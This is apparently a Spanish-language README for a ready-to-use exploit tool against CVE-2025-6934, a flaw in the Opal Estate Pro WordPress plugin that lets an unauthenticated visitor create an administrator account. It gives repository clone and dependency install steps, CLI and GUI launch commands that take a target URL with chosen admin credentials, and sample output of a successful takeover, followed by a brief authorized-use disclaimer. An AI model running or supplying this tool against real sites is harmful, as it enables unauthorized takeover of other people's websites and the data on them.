
CVE-2025-6934 Herramienta de exploit Creación de cuenta de administrador sin autenticación en el plugin de WordPress Opal Estate Pro
Creada y desarrollada completamente por mejbankadir (SMH tech y Mejban HackSheild Bajo NexoAmicus)
CVE-2025-6934 es una vulnerabilidad crítica en el plugin Opal Estate Pro de WordPress (versiones <= 1.7.5) que permite a atacantes no autenticados crear cuentas de administrador en sitios WordPress vulnerables.
Esta herramienta incluye versiones CLI (Interfaz de Línea de Comandos) y GUI (Interfaz Gráfica de Usuario) para explotar esta vulnerabilidad.
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
Características de la GUI:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
Argumentos:
-u, --url Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ ADVERTENCIA: Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El acceso no autorizado a sistemas informáticos es ilegal y poco ético.
Al utilizar esta herramienta, aceptas:
- Probar únicamente sistemas que poseas o para los que tengas permiso explícito
- No utilizar esta herramienta con fines maliciosos
- Aceptar toda la responsabilidad por cualquier consecuencia legal
| Rol | Nombre |
|---|---|
| Creador y desarrollador | mejbankadir |
| Organización | SMH tech y Mejban HackSheild Bajo NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
La herramienta desactiva automáticamente las advertencias SSL. Si encuentras problemas:
requests.packages.urllib3.disable_warnings()
Licencia MIT
Copyright (c) 2025 mejbankadir (SMH tech y Mejban HackSheild Bajo NexoAmicus)
Hecho con ❤️ por mejbankadir
SMH tech | Mejban HackSheild | Bajo NexoAmicus
| Atributo | Valor |
|---|
| CVE ID | CVE-2025-6934 |
| Gravedad | Crítica (CVSS 3.1: 9.8) |
| Plugin afectado | Opal Estate Pro |
| Versiones afectadas | <= 1.7.5 |
| Tipo de vulnerabilidad | Creación de cuenta de administrador no autenticada |
| Vector CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |